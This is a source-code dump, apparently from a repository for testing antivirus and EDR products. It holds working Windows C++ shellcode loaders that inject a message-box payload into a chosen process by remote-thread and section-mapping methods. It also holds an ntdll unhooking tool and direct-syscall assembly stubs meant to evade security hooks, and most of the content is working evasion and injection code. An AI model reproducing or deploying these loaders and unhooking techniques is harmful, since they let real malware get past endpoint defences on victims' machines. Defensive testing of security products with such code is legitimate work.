"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 41 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" 42 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d" 43 | "\x85\x27\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" 44 | "\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x54\x68\x69" 45 | "\x73\x20\x69\x6e\x6a\x65\x63\x74\x65\x64\x20\x6d\x65\x73\x73" 46 | "\x61\x67\x65\x62\x6f\x78\x20\x69\x73\x20\x6e\x6f\x74\x20\x62" 47 | "\x6c\x6f\x63\x6b\x65\x64\x2e\x00\x4f\x53\x33\x20\x44\x65\x6d" 48 | "\x6f\x00"; 49 | 50 | 51 | HANDLE processHandle; 52 | HANDLE remoteThread; 53 | PVOID remoteBuffer; 54 | 55 | int pid = atoi(argv[1]); 56 | printf("Injecting into PID : %i... 
", pid); 57 | processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid)); 58 | if (processHandle == 0) 59 | { 60 | printf("ERROR: Proc hand 0"); 61 | return -1; 62 | } 63 | remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf5, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 64 | if (remoteBuffer == 0) 65 | { 66 | printf("ERROR: Remote buf 0"); 67 | return -1; 68 | } 69 | SIZE_T lpNumberOfBytesWritten; 70 | 71 | WriteProcessMemory(processHandle, remoteBuffer, buf5, sizeof buf5, &lpNumberOfBytesWritten); 72 | if (lpNumberOfBytesWritten != (sizeof buf5)) 73 | { 74 | printf("ERROR: Written %d", lpNumberOfBytesWritten); 75 | return -1; 76 | } 77 | remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); //The one that should trigger AV 78 | if (remoteThread == 0) 79 | { 80 | printf("ERROR: Remote thr 0"); 81 | return -1; 82 | } 83 | CloseHandle(processHandle); 84 | Sleep(9000); 85 | printf("Done.\n"); 86 | return 0; 87 | } 88 | -------------------------------------------------------------------------------- /CustomCode/PaLoInj/PaLoInj.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {2f83ec28-30ea-4ff5-843b-ee474d66b935} 25 | PaLoInj 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 
93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | MultiThreaded 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /CustomCode/PaLoInj/PaLoInj.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CustomCode/PaLoIns/PaLoIns.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | 9 | void step(int line) 10 | { 11 | printf("[%d]", line); 12 | Sleep(1000); 13 | } 14 | 15 | typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; 16 | typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 17 | 
typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, * PCLIENT_ID; 18 | using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL); 19 | using myNtMapViewOfSection = NTSTATUS(NTAPI*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect); 20 | using myRtlCreateUserThread = NTSTATUS(NTAPI*)(IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientID); 21 | 22 | 23 | int main(int argc, char* argv[]) 24 | { 25 | printf("Compile time (for unique compilation): %s\n", __TIME__); 26 | printf("Waiting for some time to allow UH technique and detection of hooks...\n"); 27 | Sleep(9000); 28 | Sleep(9000); 29 | Sleep(9000); 30 | Sleep(9000); 31 | Sleep(9000); 32 | Sleep(9000); 33 | Sleep(9000); 34 | Sleep(9000); 35 | Sleep(9000); 36 | Sleep(9000); 37 | unsigned char buf5[] = 38 | 39 | //Messagebox OS3: 40 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" 41 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" 42 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" 43 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" 44 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" 45 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" 46 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" 47 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" 48 | 
"\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" 49 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" 50 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" 51 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" 52 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" 53 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 54 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" 55 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d" 56 | "\x85\x27\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" 57 | "\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x54\x68\x69" 58 | "\x73\x20\x69\x6e\x6a\x65\x63\x74\x65\x64\x20\x6d\x65\x73\x73" 59 | "\x61\x67\x65\x62\x6f\x78\x20\x69\x73\x20\x6e\x6f\x74\x20\x62" 60 | "\x6c\x6f\x63\x6b\x65\x64\x2e\x00\x4f\x53\x33\x20\x44\x65\x6d" 61 | "\x6f\x00"; 62 | 63 | HANDLE processHandle; 64 | HANDLE remoteThread; 65 | PVOID remoteBuffer; 66 | //int pid = 49716; 67 | int pid = atoi(argv[1]); 68 | printf("Injecting into PID : %i... 
", pid); 69 | step(__LINE__); 70 | myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection")); 71 | myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection")); //The one that should trigger AV 72 | myRtlCreateUserThread fRtlCreateUserThread = (myRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread")); 73 | SIZE_T size = 4096; 74 | LARGE_INTEGER sectionSize = { size }; 75 | HANDLE sectionHandle = NULL; 76 | PVOID localSectionAddress = NULL, remoteSectionAddress = NULL; 77 | step(__LINE__); 78 | // create a memory section 79 | fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); 80 | if (sectionHandle == NULL) 81 | { 82 | printf("ERROR: sec hand = NULL"); 83 | return -1; 84 | } 85 | 86 | step(__LINE__); 87 | // create a view of the memory section in the local process 88 | fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE); 89 | if (localSectionAddress == NULL) 90 | { 91 | printf("ERROR: loc sec addr = NULL"); 92 | return -1; 93 | } 94 | step(__LINE__); 95 | // create a view of the memory section in the target process 96 | HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid); 97 | if (targetHandle == 0) 98 | { 99 | printf("ERROR: Open proc hand = 0"); 100 | return -1; 101 | } 102 | step(__LINE__); 103 | fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ); 104 | if (sectionHandle == 0) 105 | { 106 | printf("ERROR: Sec hand hand = 0"); 107 | return -1; 108 | } 109 | 110 | step(__LINE__); 111 | 112 | // copy shellcode to the local view, which will get reflected in the target process's mapped view 113 | memcpy(localSectionAddress, buf5, 
sizeof buf5); 114 | step(__LINE__); 115 | HANDLE targetThreadHandle = NULL; 116 | fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL); 117 | if (targetThreadHandle == NULL) 118 | { 119 | printf("ERROR: target Thread Hand = NULL"); 120 | return -1; 121 | } 122 | 123 | Sleep(9000); 124 | step(__LINE__); 125 | printf("Done.\n"); 126 | 127 | return 0; 128 | } 129 | 130 | -------------------------------------------------------------------------------- /CustomCode/PaLoIns/PaLoIns.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {5785080c-1a0f-4c44-a7cd-b65504b3a62a} 25 | PaLoIns 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 
145 | 146 | 147 | -------------------------------------------------------------------------------- /CustomCode/PaLoIns/PaLoIns.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/PerunsFart.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #define bytesToCompare 16 7 | 8 | #include 9 | #include 10 | #include "PerunsFart.h" 11 | #include 12 | 13 | HANDLE StartSuspendedProcess() 14 | { 15 | PROCESS_INFORMATION processInfo; 16 | STARTUPINFOA startupInfo{}; 17 | startupInfo.cb = sizeof(STARTUPINFOA); 18 | char cmd[] = "notepad.exe"; 19 | if (!CreateProcessA(nullptr, cmd, nullptr, nullptr, false, CREATE_SUSPENDED, 20 | nullptr, nullptr, std::addressof(startupInfo), std::addressof(processInfo))) 21 | { 22 | std::cerr << "CreateProcess failed, " << GetLastError() << '\n'; 23 | return NULL; 24 | } 25 | return processInfo.hProcess; 26 | } 27 | 28 | #define NtCurrentProcess() INVALID_HANDLE_VALUE 29 | 30 | int wmain(int argc, wchar_t* argv[]) 31 | { 32 | if (argc != 2) 33 | { 34 | printf("Supply target pid to restore ntdll.dll for using new sleeping notepad. 
\n"); 35 | return -1; 36 | } 37 | 38 | DWORD targetPid = _wtoi(argv[1]); 39 | 40 | HANDLE pausedProcess = StartSuspendedProcess(); 41 | Sleep(5000); //Can take some while to start due to AV 42 | if (pausedProcess == NULL) 43 | { 44 | printf("ERROR: could not create sleeping notepad!"); 45 | return -1; 46 | } 47 | 48 | //Open process using syscalls 49 | DWORD pid = targetPid; 50 | HANDLE processHandleTarget = NULL; 51 | OBJECT_ATTRIBUTES ObjectAttributesTarget; 52 | InitializeObjectAttributes(&ObjectAttributesTarget, NULL, 0, NULL, NULL); 53 | CLIENT_ID uPidTarget = { 0 }; 54 | uPidTarget.UniqueProcess = (HANDLE)pid; 55 | uPidTarget.UniqueThread = (HANDLE)0; 56 | NTSTATUS statusOpenTarget = ZwOpenProcess10(&processHandleTarget, SYNCHRONIZE | STANDARD_RIGHTS_REQUIRED | 0xFFFF, &ObjectAttributesTarget, &uPidTarget); 57 | if (statusOpenTarget != 0) 58 | { 59 | printf("Error opening target process!"); 60 | return -2; 61 | } 62 | 63 | HMODULE Ntdll = GetModuleHandleA((LPCSTR)"ntdll.dll"); 64 | MODULEINFO moduleInfo = {}; 65 | 66 | //Get ntdll.dll information based on loaded version for current process 67 | if (GetModuleInformation(GetCurrentProcess(), Ntdll, &moduleInfo, sizeof(moduleInfo)) == 0) { 68 | printf("GetModuleInformation error: %d\n", GetLastError()); 69 | printf("[%d]\n", __LINE__); 70 | return -3; 71 | } 72 | 73 | // Get base address of hooked Ntdll from MODULEINFO struct 74 | LPVOID hookedNtdllBaseAddress = NULL; 75 | hookedNtdllBaseAddress = (LPVOID)moduleInfo.lpBaseOfDll; 76 | 77 | printf("%-20s 0x%p\n", "Tainted dll base address: ", hookedNtdllBaseAddress); 78 | 79 | PIMAGE_DOS_HEADER dosHeader = 0; 80 | PIMAGE_NT_HEADERS ntHeader = 0; 81 | PIMAGE_SECTION_HEADER sectionHeader = 0; 82 | LPSTR sectionName; 83 | SIZE_T textSectionSize = NULL; 84 | LPVOID hookedNtdllTextStartAddress = NULL; 85 | 86 | // Get DOS header 87 | dosHeader = (PIMAGE_DOS_HEADER)hookedNtdllBaseAddress; 88 | 89 | // Get Nt Header 90 | ntHeader = 
(PIMAGE_NT_HEADERS)((DWORD_PTR)hookedNtdllBaseAddress + dosHeader->e_lfanew); 91 | 92 | Sleep(50); 93 | // Loop through all the PE sections until we find .text section (some adapted code based on Shellycoat) 94 | for (SIZE_T i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { 95 | // Get PE section header 96 | sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(ntHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); 97 | 98 | // Get section name 99 | sectionName = (LPSTR)sectionHeader->Name; 100 | 101 | // We found .text section 102 | if (!strcmp(sectionName, ".text")) { 103 | Sleep(50); 104 | printf("Found .text section\n"); 105 | 106 | textSectionSize = sectionHeader->Misc.VirtualSize; 107 | printf(".text section size: %d\n", textSectionSize); 108 | hookedNtdllTextStartAddress = (LPVOID)((DWORD_PTR)hookedNtdllBaseAddress + (DWORD_PTR)sectionHeader->VirtualAddress); 109 | break; 110 | } 111 | } 112 | if (textSectionSize == NULL) 113 | { 114 | printf("Error: .text section not found!"); 115 | return -4; 116 | } 117 | 118 | SIZE_T lpNumberOfBytesRead = 0; 119 | SIZE_T lpNumberOfBytesWritten = 0; 120 | PVOID buffer = (PVOID)malloc((ULONG)(textSectionSize+4096)); //4096 is page size 121 | 122 | printf("Reading from source...\n"); 123 | NTSTATUS statusRead = NtReadVirtualMemory(pausedProcess,hookedNtdllTextStartAddress,buffer, textSectionSize,&lpNumberOfBytesRead); 124 | if (statusRead != STATUS_SUCCESS) { 125 | printf("NtReadVirtualMemory error: %X\n", statusRead); 126 | return -5; 127 | } 128 | //Remove page protection (store old details) 129 | printf("Removing page prot...\n"); 130 | ULONG oldProtection; 131 | NTSTATUS statusProtect = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress,&textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 132 | if (statusProtect != STATUS_SUCCESS) { 133 | printf("ZwProtectVirtualMemory10 error: %X\n", statusProtect); 134 | return -6; 135 | } 136 | 137 | //Write fresh ntdll.dll 
138 | printf("Writing to target...\n"); 139 | NTSTATUS statusWrite = ZwWriteVirtualMemory10(processHandleTarget, hookedNtdllTextStartAddress, buffer, textSectionSize, &lpNumberOfBytesWritten); 140 | if (statusWrite != STATUS_SUCCESS) { 141 | printf("ZwWriteVirtualMemory10 error: %X\n", statusWrite); 142 | return -7; 143 | } 144 | 145 | //Restore right page protections 146 | printf("Restoring page prot...\n"); 147 | NTSTATUS statusRestore = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress, &textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 148 | if (statusRestore != STATUS_SUCCESS) { 149 | printf("ZwProtectVirtualMemory10 error: %X\n", statusRestore); 150 | return -8; 151 | } 152 | TerminateProcess(pausedProcess, 0); 153 | CloseHandle(pausedProcess); 154 | printf("Done!\n"); 155 | } -------------------------------------------------------------------------------- /CustomCode/PerunsFart/PerunsFart.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {dbf7feb0-f95d-41be-8ecb-6caca1be2991} 25 | PerunsFart 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | false 79 | 80 | 81 | true 82 | 83 | 84 | false 85 | 86 | 87 | 88 | Level3 89 | true 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | Level3 101 | true 102 | true 103 | true 104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | 
Console 109 | true 110 | true 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | true 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/PerunsFart.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /CustomCode/PerunsFart/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | NtReadVirtualMemory PROC 8 | mov rax, gs:[60h] ; Load PEB into RAX. 9 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 10 | cmp dword ptr [rax+118h], 10 11 | je NtReadVirtualMemory_Check_10_0_XXXX 12 | jmp NtReadVirtualMemory_SystemCall_Unknown 13 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 
14 | cmp word ptr [rax+120h], 10240 15 | je NtReadVirtualMemory_SystemCall_10_0_10240 16 | cmp word ptr [rax+120h], 10586 17 | je NtReadVirtualMemory_SystemCall_10_0_10586 18 | cmp word ptr [rax+120h], 14393 19 | je NtReadVirtualMemory_SystemCall_10_0_14393 20 | cmp word ptr [rax+120h], 15063 21 | je NtReadVirtualMemory_SystemCall_10_0_15063 22 | cmp word ptr [rax+120h], 16299 23 | je NtReadVirtualMemory_SystemCall_10_0_16299 24 | cmp word ptr [rax+120h], 17134 25 | je NtReadVirtualMemory_SystemCall_10_0_17134 26 | cmp word ptr [rax+120h], 17763 27 | je NtReadVirtualMemory_SystemCall_10_0_17763 28 | cmp word ptr [rax+120h], 18362 29 | je NtReadVirtualMemory_SystemCall_10_0_18362 30 | cmp word ptr [rax+120h], 18363 31 | je NtReadVirtualMemory_SystemCall_10_0_18363 32 | cmp word ptr [rax+120h], 19041 33 | je NtReadVirtualMemory_SystemCall_10_0_19041 34 | cmp word ptr [rax+120h], 19042 35 | je NtReadVirtualMemory_SystemCall_10_0_19042 36 | jmp NtReadVirtualMemory_SystemCall_Unknown 37 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 38 | mov eax, 003fh 39 | jmp NtReadVirtualMemory_Epilogue 40 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 41 | mov eax, 003fh 42 | jmp NtReadVirtualMemory_Epilogue 43 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 44 | mov eax, 003fh 45 | jmp NtReadVirtualMemory_Epilogue 46 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 47 | mov eax, 003fh 48 | jmp NtReadVirtualMemory_Epilogue 49 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 50 | mov eax, 003fh 51 | jmp NtReadVirtualMemory_Epilogue 52 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 53 | mov eax, 003fh 54 | jmp NtReadVirtualMemory_Epilogue 55 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 56 | mov eax, 003fh 57 | jmp NtReadVirtualMemory_Epilogue 58 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 
10.0.18362 (1903) 59 | mov eax, 003fh 60 | jmp NtReadVirtualMemory_Epilogue 61 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 62 | mov eax, 003fh 63 | jmp NtReadVirtualMemory_Epilogue 64 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 65 | mov eax, 003fh 66 | jmp NtReadVirtualMemory_Epilogue 67 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 68 | mov eax, 003fh 69 | jmp NtReadVirtualMemory_Epilogue 70 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 71 | ret 72 | NtReadVirtualMemory_Epilogue: 73 | mov r10, rcx 74 | syscall 75 | ret 76 | NtReadVirtualMemory ENDP 77 | 78 | ZwOpenProcess7SP1 proc 79 | mov r10, rcx 80 | mov eax, 23h 81 | syscall 82 | ret 83 | ZwOpenProcess7SP1 endp 84 | 85 | ZwClose7SP1 proc 86 | mov r10, rcx 87 | mov eax, 0Ch 88 | syscall 89 | ret 90 | ZwClose7SP1 endp 91 | 92 | ZwWriteVirtualMemory7SP1 proc 93 | mov r10, rcx 94 | mov eax, 37h 95 | syscall 96 | ret 97 | ZwWriteVirtualMemory7SP1 endp 98 | 99 | ZwProtectVirtualMemory7SP1 proc 100 | mov r10, rcx 101 | mov eax, 4Dh 102 | syscall 103 | ret 104 | ZwProtectVirtualMemory7SP1 endp 105 | 106 | ZwQuerySystemInformation7SP1 proc 107 | mov r10, rcx 108 | mov eax, 33h 109 | syscall 110 | ret 111 | ZwQuerySystemInformation7SP1 endp 112 | 113 | NtAllocateVirtualMemory7SP1 proc 114 | mov r10, rcx 115 | mov eax, 15h 116 | syscall 117 | ret 118 | NtAllocateVirtualMemory7SP1 endp 119 | 120 | NtFreeVirtualMemory7SP1 proc 121 | mov r10, rcx 122 | mov eax, 1Bh 123 | syscall 124 | ret 125 | NtFreeVirtualMemory7SP1 endp 126 | 127 | NtCreateFile7SP1 proc 128 | mov r10, rcx 129 | mov eax, 52h 130 | syscall 131 | ret 132 | NtCreateFile7SP1 endp 133 | 134 | ; Windows 8 / Server 2012 specific syscalls 135 | 136 | ZwOpenProcess80 proc 137 | mov r10, rcx 138 | mov eax, 24h 139 | syscall 140 | ret 141 | ZwOpenProcess80 endp 142 | 143 | ZwClose80 proc 144 | mov r10, rcx 145 | mov eax, 0Dh 146 | syscall 147 | ret 148 | 
